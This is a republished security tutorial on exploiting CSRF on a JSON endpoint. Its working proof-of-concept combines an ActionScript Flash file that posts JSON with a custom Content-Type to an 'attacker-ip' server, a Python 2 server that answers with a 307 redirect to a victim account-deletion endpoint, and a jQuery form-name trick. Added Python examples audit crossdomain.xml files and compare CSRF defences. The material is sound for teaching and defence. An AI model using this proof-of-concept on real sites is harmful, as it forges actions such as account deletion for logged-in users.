2025-03-31 update, from SLTechnology News&Howtos, Network Security section. Shulou (Shulou.com) 05/31 report.
Many newcomers are unclear on how a CSRF vulnerability on a JSON endpoint can be exploited. To help with that, this article explains it in detail; readers who need this can follow along and hopefully take something away.
(CSRF + Flash + HTTP 307) = stop it, you are "dead"!
For exploiting a CSRF vulnerability on a JSON endpoint through a server controlled by the attacker, I recommend the GitHub project json-flash-csrf-poc [download address], which packages the technique described below.
Background story
During a recent penetration test we found not only several business-logic, XSS and insecure-direct-object-reference vulnerabilities, but also a number of cross-site request forgery (CSRF) vulnerabilities. One of them was on a JSON endpoint that accepts a POST body in JSON format. To exploit it we had to send the POST body with a custom Content-Type header, which standard HTML forms cannot do, and with XMLHttpRequest a custom header triggers a CORS preflight request. The rest of this article shows how we exploited this CSRF vulnerability.
Problems encountered when exploiting CSRF vulnerabilities
CSRF vulnerabilities are very useful to attackers. If a website has one, the attacker can exploit the browser's behaviour of attaching the authentication cookie to every request to the site regardless of which page initiated it, and by default neither the server nor the application distinguishes where a request came from.
For example, the following simple PoC exploits a CSRF vulnerability by invoking the account deletion function through a POST form:
When a logged-in user browses the malicious page (in the same browser, with the authenticated session still active), the page triggers the function with a POST request. Because the browser attaches the authentication cookie by default, the function executes on the server side and the attack is complete.
Note that the Content-Type header in this request is set to application/x-www-form-urlencoded because the server needs to receive URL-encoded HTML form data.
So why can't we use this PoC to take advantage of the CSRF in the JSON endpoint? The reasons are as follows:
1. The POST body needs to be sent in JSON format, which is cumbersome to build from HTML form elements.
2. The Content-Type header needs to be set to application/json. Setting a custom header requires XMLHttpRequest, which then sends an OPTIONS preflight request to the server.
Flash and redirection
Adobe Flash lets a web page issue requests through ActionScript, and ActionScript can set custom headers on those requests. However, unless the remote site serves a crossdomain.xml policy that permits it, Flash will not send a request carrying custom headers to a server of a different origin.
To avoid the cross-domain policy file entirely, we use Flash to send the request (with our POST payload) to the same server that hosts the Flash file, requesting a second resource there. That resource acts as a redirector and responds with HTTP status code 307. What distinguishes 307 from the other 3XX status codes is the guarantee that the request method and body are not changed when the redirected request is sent. The 307 redirect therefore carries our POST body and HTTP headers to the final URL we specify and completes the attack.
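The paragraph above notes that Flash only sends custom headers cross-origin when the target site's crossdomain.xml permits it; the technique here sidesteps that by talking to the attacker's own server first, but an over-permissive policy on the victim site would remove even that step. The following Python audit of a crossdomain.xml document is an added example, not code from the article or from the json-flash-csrf-poc project: it flags the wildcard and site-control settings a defender should not see. Both policy documents and the host names in them are constructed for the example.

```python
import xml.etree.ElementTree as ET

# Constructed sample policies, not files from the article's engagement.
PERMISSIVE_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="*" secure="false" />
  <allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>
"""

STRICT_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only" />
  <allow-access-from domain="static.victim-site" />
  <allow-http-request-headers-from domain="static.victim-site" headers="X-Requested-With" />
</cross-domain-policy>
"""


def audit_crossdomain(xml_text):
    """Return a list of (finding_code, detail) tuples for one crossdomain.xml.

    xml.etree is acceptable for a policy you fetched yourself; parse untrusted
    documents with defusedxml instead.
    """
    findings = []
    root = ET.fromstring(xml_text)
    if root.tag != "cross-domain-policy":
        return [("not-a-policy", f"root element is <{root.tag}>")]

    # Without master-only/none, additional policy files elsewhere on the host
    # can widen what the master policy allows.
    site_control = root.find("site-control")
    mode = site_control.get("permitted-cross-domain-policies", "") if site_control is not None else ""
    if mode not in ("master-only", "none"):
        findings.append(("site-control",
                         f"permitted-cross-domain-policies={mode or 'missing'}"))

    # Which origins may make credentialed requests and read the responses.
    for el in root.findall("allow-access-from"):
        domain = el.get("domain", "")
        if domain == "*":
            findings.append(("wildcard-domain",
                             "any origin may send cookie-bearing requests and read responses"))
        elif domain.startswith("*."):
            findings.append(("subdomain-wildcard", f"every host under {domain[2:]} is trusted"))
        if el.get("secure", "true").lower() == "false":
            findings.append(("insecure-flag",
                             'secure="false" lets http:// content use an https:// policy'))

    # Which origins may attach custom request headers (the Content-Type case in the article).
    for el in root.findall("allow-http-request-headers-from"):
        domain = el.get("domain", "")
        allowed = [h.strip() for h in el.get("headers", "").split(",")]
        if domain == "*":
            findings.append(("wildcard-header-domain", "any origin may send custom headers"))
        if "*" in allowed:
            findings.append(("wildcard-headers",
                             "any header, including Content-Type, may be set cross-origin"))
    return findings


if __name__ == "__main__":
    for name, policy in (("permissive", PERMISSIVE_POLICY), ("strict", STRICT_POLICY)):
        print(name, audit_crossdomain(policy) or "no findings")
```

Run it against the policy served at the root of each host you own; the strict sample shows the shape of a policy that names specific hosts and headers and locks out secondary policy files.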
Putting it together
To design the final PoC, let's first take a look at the vulnerable JSON endpoints and related requirements:
1. The /userdelete endpoint only accepts requests whose Content-Type header is application/json.
2. The vulnerable endpoint expects the following JSON data:
{"acctnum": "100,100", "confirm": "true"}
Attacker setup
The attacker's server consists of the following components and traffic:
1. When the target user loads and runs the attacker-hosted Flash file in the browser, the malicious file sends an HTTP POST request to the attacker's server (the redirector).
2. The redirector script answers with an HTTP 307 status code and a Location header pointing at the final URL.
3. The target user's browser then sends a second POST request, with the same body and headers, to the final URL, and the attack is complete.
Create a csrf.swf file
To create a csrf.swf file that can send Web requests, we need to follow these steps:
1. Install the Flex SDK to compile ActionScript into a swf file. Flex requires a 32-bit JVM, which you get by installing a 32-bit JDK.
2. Create a text file named csrf.as containing the following ActionScript code.
3. Get the IP address or domain name of the host (the attacker's server) that will serve the Flash file and replace the one in the code.
4. Run the command "mxmlc csrf.as" to compile the file to csrf.swf.
package {
    import flash.display.Sprite;
    import flash.net.URLLoader;
    import flash.net.URLRequest;
    import flash.net.URLRequestHeader;
    import flash.net.URLRequestMethod;

    public class csrf extends Sprite {
        public function csrf() {
            super();
            // JSON body expected by the vulnerable endpoint
            var myData:Object = {"acctnum": "100", "confirm": "true"};
            var myJson:String = JSON.stringify(myData);
            // Same-origin target: the attacker's own server (the redirector),
            // so no crossdomain.xml is consulted for the custom header
            var url:String = "http://attacker-ip:8000/";
            var request:URLRequest = new URLRequest(url);
            request.requestHeaders.push(new URLRequestHeader("Content-Type", "application/json"));
            request.data = myJson;
            request.method = URLRequestMethod.POST;
            var urlLoader:URLLoader = new URLLoader();
            try {
                urlLoader.load(request);
            } catch (e:Error) {
                trace(e);
            }
        }
    }
}
Create a Web server
The server's job is simply to host csrf.swf and answer every other HTTP request with a 307 redirect, which can be done with Python's BaseHTTPServer module (Python 2).
1. Create a Python file named pyserver.py containing the following code.
2. This Python code is the web server that hosts csrf.swf and sends HTTP 307 redirects to the http://victim-site/userdelete endpoint.
3. Start the web server with the command "python pyserver.py".
import BaseHTTPServer
import time
import sys

HOST = ''       # bind to all interfaces
PORT = 8000


class RedirectHandler(BaseHTTPServer.BaseHTTPRequestHandler):
    def do_POST(s):
        if s.path == '/csrf.swf':
            # Serve the compiled Flash file
            s.send_response(200)
            s.send_header("Content-Type", "application/x-shockwave-flash")
            s.end_headers()
            s.wfile.write(open("csrf.swf", "rb").read())
            return
        # Anything else: 307 redirect, which preserves the method and body
        s.send_response(307)
        s.send_header("Location", "http://victim-site/userdelete")
        s.end_headers()

    def do_GET(s):
        print(s.path)
        s.do_POST()


if __name__ == '__main__':
    server_class = BaseHTTPServer.HTTPServer
    httpd = server_class((HOST, PORT), RedirectHandler)
    print time.asctime(), "Server Starts - %s %s" % (HOST, PORT)
    try:
        httpd.serve_forever()
    except KeyboardInterrupt:
        pass
    httpd.server_close()
    print time.asctime(), "Server Stops - %s %s" % (HOST, PORT)
Note: the HTTP redirect server is based on the code in this [GitHub library].
PoC workflow
The following is the whole attack flow; the target user's browser must have Flash enabled:
1. The user logs in to http://victim-site/ in the browser.
2. The user is redirected to http://attacker-ip:8000/csrf.swf.
3. The Flash file loads and sends a POST payload with the custom header to http://attacker-ip:8000/.
4. The attacker's server answers with an HTTP 307 redirect, so the POST request body and the custom HTTP header are forwarded unchanged to http://victim-site/.
5. The target user refreshes the http://victim-site/ page and finds that the account has been deleted.
Other ideas
We had to use a Flash file and a 307 redirector here because the server checks that the request's Content-Type is application/json. If the server did not perform that check, we could use JavaScript to set a form field's name attribute to the JSON string and submit the form, so that the POST body is the JSON text, with code like the following:
$(document).ready(function () {
    // The field name carries the JSON; the trailing "a": " absorbs the "=value" the form encoding appends
    $("#json").attr("name", '{"acctnum": "100", "confirm": "true", "a": "');
    $("#myform").submit();
});
Of course, the Fetch API can also be used to send the JSON POST request and complete the attack.
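Both the "Problems encountered" section and the "Other ideas" section turn on the same observation: a Content-Type check is the only thing standing between the endpoint and a cross-site POST, and Flash plus a 307 redirect satisfies that check. The Python below is an added example, not code from the article or from the json-flash-csrf-poc project. It contrasts a content-type-only policy with a layered one (Content-Type, Origin/Referer that fails closed when absent, a session-bound anti-CSRF token, and strict JSON parsing) on constructed sample requests. The host names, the token and the sample requests are constructed; in particular, that the redirected Flash request arrives with no usable Origin or Referer is an assumption made for the sample, not a captured request.

```python
import hmac
import json
from urllib.parse import urlsplit

# Origin of the application hosting /userdelete (host name taken from the article).
TRUSTED_ORIGIN = "http://victim-site"
# Per-session anti-CSRF token; a real application generates this server-side per session.
SESSION_TOKEN = "constructed-session-token"

# Constructed sample requests: the headers/body the /userdelete handler would see.
SAMPLES = {
    # Legitimate same-origin fetch() from the application's own JavaScript.
    "legit": {
        "headers": {"Content-Type": "application/json",
                    "Origin": "http://victim-site",
                    "X-CSRF-Token": SESSION_TOKEN},
        "body": '{"acctnum": "100", "confirm": "true"}',
    },
    # Plain HTML form auto-submitted from an attacker page.
    "html_form": {
        "headers": {"Content-Type": "application/x-www-form-urlencoded",
                    "Origin": "http://attacker-ip:8000"},
        "body": "acctnum=100&confirm=true",
    },
    # Flash-originated POST after the 307 redirect: the JSON Content-Type survives;
    # assumption for this sample: no usable Origin or Referer is present.
    "flash_307": {
        "headers": {"Content-Type": "application/json"},
        "body": '{"acctnum": "100", "confirm": "true"}',
    },
}


def _media_type(headers):
    return headers.get("Content-Type", "").split(";")[0].strip().lower()


def content_type_only_policy(req):
    """The single gate the article's target relied on: is the body declared JSON?"""
    return _media_type(req["headers"]) == "application/json"


def request_origin(headers):
    """scheme://host[:port] from Origin, falling back to Referer; None if neither is usable."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source or source == "null":
        return None
    parts = urlsplit(source)
    if not parts.scheme or not parts.netloc:
        return None
    return f"{parts.scheme}://{parts.netloc}"


def layered_policy(req, expected_token):
    """Return (accepted, reason). No gate depends on the client being unable to set headers."""
    headers = req["headers"]
    if not content_type_only_policy(req):
        return False, "content-type"
    # Fail closed: a state-changing request with no source header is rejected.
    origin = request_origin(headers)
    if origin is None:
        return False, "no-origin"
    if origin != TRUSTED_ORIGIN:
        return False, "cross-origin"
    # Session-bound token; a cross-site page cannot read it, so it cannot replay it.
    token = headers.get("X-CSRF-Token", "")
    if not hmac.compare_digest(token, expected_token):
        return False, "bad-token"
    try:
        payload = json.loads(req["body"])
    except ValueError:
        return False, "malformed-json"
    if not isinstance(payload, dict) or payload.get("confirm") != "true":
        return False, "bad-payload"
    return True, "ok"


def compare_policies():
    """What each policy does with every sample request, keyed by sample name."""
    return {name: (content_type_only_policy(req), layered_policy(req, SESSION_TOKEN))
            for name, req in SAMPLES.items()}


if __name__ == "__main__":
    for name, (ct_only, layered) in compare_policies().items():
        print(f"{name:10s} content-type-only={ct_only!s:5s} layered={layered}")
```

The flash_307 sample is the point of the comparison: the content-type-only policy accepts it, the layered policy rejects it at the origin gate, and even a client that could forge a plausible Origin would still fail the token check.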